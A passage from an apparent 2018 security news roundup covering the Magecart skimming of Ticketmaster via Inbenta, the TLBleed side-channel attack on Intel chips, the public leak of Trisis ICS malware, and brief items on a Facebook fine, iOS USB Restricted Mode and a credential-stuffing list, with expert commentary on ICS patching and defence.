“The target for Magecart actors was the payment information entered into forms on Ticketmaster’s various websites,” Klijnsma and Herman wrote in a blog post. “The method was hacking third-party components shared by many of the most frequented e-commerce sites in the world.”

A digital credit card skimmer, according to RiskIQ, uses scripts injected into websites to steal data entered into forms. Magecart “placed one of these digital skimmers on Ticketmaster websites through the compromise of a third-party functionality supplier known as Inbenta,” the researchers said, noting specifically that Ticketmaster’s network was not directly breached.

RiskIQ has been tracking the activities of Magecart since 2015 and said attacks by the group have been “ramping up in frequency and impact” throughout the past few years, and Ticketmaster and Inbenta are not the only organizations that have been affected by this threat.

According to Klijnsma and Herman, Inbenta’s custom JavaScript code was “wholly replaced” with card skimmers by Magecart.

“In the use of third-party JavaScript libraries, whether a customized module or not, it may be expected that configuration options are available to modify the generated JavaScript. However, the entire replacement of the script in question is generally beyond what one would expect to see,” they wrote.

RiskIQ also noted that the command and control servers to which the skimmed data is sent have been active since 2016, though that doesn’t mean the Ticketmaster websites were affected the entire time.

The Ticketmaster breach is just “the tip of the iceberg” according to Klijnsma and Herman.

“The Ticketmaster incident received quite a lot of publicity and attention, but the Magecart problem extends to e-commerce sites well beyond Ticketmaster, and we believe it’s cause for far greater concern,” they wrote. “We’ve identified over 800 victim websites from Magecart’s main campaigns making it likely bigger than any other credit card breach to date.”

In other news:

  • The U.K.’s Information Commissioner’s Office (ICO) is fining Facebook £500,000 — more than $600,000 — for failing to protect its users’ data from misuse by Cambridge Analytica. The ICO is also going to bring criminal charges against the parent company of Cambridge Analytica, which gathered the data of millions of Americans before the 2016 presidential election. The ICO has been investigating data privacy abuses like the one by Cambridge Analytica — which has since gone out of business — and its investigations will continue. The fine brought against Facebook is reportedly the largest ever issued by the ICO and the maximum amount allowed under the U.K.’s Data Protection Act.
  • Apple will roll out USB Restricted Mode as part of the new version of iOS 11.4.1. USB Restricted Mode prevents iOS devices that have been locked for over an hour from connecting with USB devices that plug into the Lightning port. “If you don’t first unlock your password-protected iOS device — or you haven’t unlocked and connected it to a USB accessory within the past hour — your iOS device won’t communicate with the accessory or computer, and, in some cases, it might not charge,” Apple explained. Apple hasn’t provided the reason for this feature, but it will make it more difficult for forensics analysts and law enforcement to access data on locked devices.
  • Security researcher Troy Hunt discovered an online credential stuffing list that contained 111 million compromised records. The records included email addresses and passwords that were stored on a web server in France. The data set Hunt looked at had a folder called “USA” — though it has not been confirmed whether or not all the data came from Americans — and the files had dates starting in early April 2018. “That one file alone had millions of records in it and due to the nature of password reuse, hundreds of thousands of those, at least, will unlock all sorts of other accounts belonging to the email addresses involved,” Hunt said. The site with this information has been taken down, so it’s no longer accessible. Hunt also said there’s no way to know which websites leaked the credentials and suggests users implement password managers and make their passwords stronger and more unique.

TLBleed attack can extract signing keys, but exploit is difficult

An interesting, new side-channel attack abuses the Hyper-Threading feature of Intel chips and can extract signing keys with near-perfect accuracy. But both the researchers and Intel downplayed the danger of the exploit.

Ben Gras, Kaveh Razavi, Herbert Bos and Cristiano Giuffrida, researchers in Vrije Universiteit Amsterdam’s systems and network security group (VUSec), said their attack, called TLBleed, takes advantage of the translation lookaside buffer (TLB), the per-core cache of virtual-to-physical address translations that two Hyper-Threading siblings share. In their demonstration, a process running on the sibling thread recovered the 256-bit EdDSA signing key used by libgcrypt, with a success rate of 99.8% on Intel Skylake and Coffee Lake processors and 98.2% on Broadwell Xeon chips.

However, Gras tweeted that users shouldn’t be too scared of TLBleed, because while it is “a cool attack, TLBleed is not the new Spectre.”

“The OpenBSD [Hyper-Threading] disable has generated interest in TLBleed,” Gras wrote on Twitter. “TLBleed is a new side-channel in that it shows that (a) cache side-channel protection isn’t enough: TLB still leaks information; (b) side-channel safe code that is constant only in the control flow and time but not data flow is unsafe; (c) coarse-grained access patterns leak more than was previously thought.”

Justin Jett, director of audit and compliance for Plixer LLC, a network traffic analysis company based in Kennebunk, Maine, said TLBleed is “fairly dangerous, given that the flaw allows for applications to gain access to sensitive memory information from other applications.” But he noted that exploiting the issue would prove challenging.

“The execution is fairly difficult, because a malicious actor would need to infect a machine that has an application installed that they want to exploit. Once the machine is infected, the malware would need to know when the application was executing code to be able to know which memory block the sensitive information is being stored in. Only then will the malware be able to attempt to retrieve the data,” Jett wrote via email. “This is particularly concerning for applications that generate encryption keys, because the level of security that the application is trying to create could effectively be reduced to zero if an attacker is able to decipher the private key.”

Intel also downplayed the dangers associated with TLBleed; the company has not assigned a CVE number and will not patch it.

“TLBleed uses the translation lookaside buffer, a cache common to many high-performance microprocessors that stores recent address translations from virtual memory to physical memory. Software or software libraries such as Intel Integrated Performance Primitives Cryptography version U3.1 — written to ensure constant execution time and data independent cache traces should be immune to TLBleed,” Intel wrote in a statement via email. “Protecting our customers’ data and ensuring the security of our products is a top priority for Intel, and we will continue to work with customers, partners and researchers to understand and mitigate any vulnerabilities that are identified.”

Jett noted that even if Intel isn’t planning a patch, it should do more to alert customers to the dangers of TLBleed.

“Intel’s decision to not release a CVE number is odd at best. While Intel doesn’t plan to patch the vulnerability, a CVE number should have been requested so that organizations could be updated on the vulnerability and software developers would know to write their software in a way that may avoid exploitation,” Jett wrote. “Without a CVE number, many organizations will remain unaware of the flaw.”

The researchers plan to release the full paper this week. And, in August, Gras will present on the topic at Black Hat 2018 in Las Vegas.

Trisis ICS malware was publicly available after attack

The malware used in an industrial control system attack in December has been found circulating publicly on the internet after being copied from an online database.


Trisis industrial control system (ICS) malware was first disclosed by FireEye’s Mandiant threat research team on Dec. 14, after an attack on an unknown organization. The malware specifically targeted the Triconex Safety Instrumented System (SIS) controllers made by Schneider Electric and has been called either Triton or Trisis because of this. One week after the initial reveal by Mandiant, Schneider Electric reportedly posted a file containing sensitive pieces of the Trisis malware framework to VirusTotal — an antivirus scan database owned by Google — on Dec. 22.

Cyberscoop, which first reported the story, said Schneider Electric quickly received a notice to remove the file from VirusTotal, but by the time it came down the file had already been copied and reposted to public code repositories such as GitHub, where it has been freely available ever since.

Although the Trisis framework accidentally posted by Schneider Electric would not by itself be enough to recreate the ICS malware, the main Trisis executable — Trilog.exe — had also been published.

Paul Brager Jr., technical product security leader at Baker Hughes, based in Houston, Texas, and former cybersecurity project manager focused on ICS at Booz Allen Hamilton, said “it is highly conceivable that variants of Trisis could surface that are tailored toward control systems by Siemens, Rockwell Automation, Honeywell or other digital industrial manufacturers.”

“Because most control environments are not homogenous, patching one series of vulnerabilities for a particular manufacturer does not necessarily lessen the exposure to the infrastructure from something like Trisis, or a variant therein,” Brager told SearchSecurity. “What we are seeing is an effort to engage control systems not only at the constituent [component level] but the underlying systems that seek to manage those control environments. Just as Trisis was written to target a specific Schneider SIS, there is nothing preventing nation-state actors with the means and resources to refashion Trisis to target any SIS or other ICS subsystem with vulnerabilities that can be exploited.”

Eddie Habibi, founder and CEO of PAS Global, an ICS cybersecurity company headquartered in Houston, Texas, said the problem is that “there are two speeds in ICS cybersecurity — industry speed and hacker speed.” 

“Hackers can move much more quickly than industry. [Industry] may not patch a system for months or ever, depending on assessed risk,” Habibi told SearchSecurity. “Although this may sound ominous, [ICS] does have safeguards in place that protect reliability and safety. The problem is that hackers are learning more about these systems and how to manipulate them, as we saw in the [Trisis attack].”
Bryan Singer, director of industrial cybersecurity services at IOActive, the cybersecurity company headquartered in Seattle, Wash., said the threat of Trisis being repurposed may not have sunk in with organizations.

“Wake-up calls haven’t woken anybody up. In watershed moments such as Equifax, Target and Triconex, everyone freaks out but doesn’t do anything,” Singer told SearchSecurity. “We’ll see a lot of the same here — people like to dismiss the threat and think it won’t happen because they’re not being targeted. IT proves this completely untrue. There are far too many attack mechanisms to say it won’t happen to us.”

ICS patching issues

Experts noted that if organizations don’t fully recognize the threat, it may be even more difficult to harden security because of the inherent differences in patching ICS.

Brager noted that patching in ICS environments can be especially tricky since “many of the components, applications, and services are proprietary and highly interdependent.”

“Because of the critical process potential of ICS systems and their components, significant testing is usually required to ensure that an applied patch yields an expected outcome and does not interfere with, or degrade in any fashion, the operations of the control system,” Brager said. “This requirement and diligence typically [stretches] out the patching cycle within [operational technology (OT)] environments, often months, and ultimately depends on the ability to patch and the resource availability to do so.”

Emily Miller, director of national security and critical infrastructure programs at Mocana, and formerly the chief of process management for the DHS ICS Cyber Emergency Response Team, said the flaws that allowed the Trisis attack were not an inherent vulnerability in the device, but “due to poor cyber hygiene.”

“In operational technology, patching is tricky business — remember, in OT we’re talking about devices that control physical processes that can impact lives, not just bits and bytes of data,” Miller told SearchSecurity. “Quickly patching devices, as you would expect to see in an IT environment, can have real, catastrophic consequences in an operational environment.”

ICS defense

Brager said that ICS networks have traditionally been kept isolated from external networks, but growing interconnectivity is making security more difficult.

“For many years, ICS environments were largely thought to be physically and logically isolated from other networks and/or environments. Connectivity was largely a function of interconnected buses and short-run links that allowed communication through a closed loop architecture,” Brager said. “Network enablement of components within ICS expanded the threat landscape exponentially, as systems that were not originally designed to be internet/network facing suddenly were — and the facilities needed to patch these devices were largely immature and arduous.”

Habibi agreed that isolating ICS is no longer a sufficient security strategy.

“After years of reconnaissance, the bad guys have shown they can penetrate those defensive layers, bridge the illusory air gap, and take deliberate control over [industrial control systems]. CRASHOVERRIDE did not need a vulnerability to bring down power in the Ukraine — only ICS and process knowledge that had been built over time,” Habibi said. “A successful Trisis-like attack, under certain circumstances, can lead to a catastrophic accident. Consider a scenario where a skilled malicious attacker breaches a Triconex system, which is designed to safely shut down a reactor in a fluid catalytic cracking unit in a refinery, by bypassing the trip function. This simple change could act as a time bomb and remove the failsafe that ultimately protects the plant from a catastrophic event.”

Miller said the Trisis attack is “more evidence that we need to start approaching this problem differently.”

“Rather than continuing to chase vulnerabilities and trying to implement an IT approach to OT security, we should instead think about how we can make critical devices inherently secure and more difficult for hackers to gain access,” Miller said. “Without access to an ICS device, hackers cannot begin to take advantage of a vulnerability. Certainly, defense in depth methodologies and good cyber hygiene are a part of the solution, but what happens when those techniques fail, and the actors can remotely access a device and potentially manipulate it?”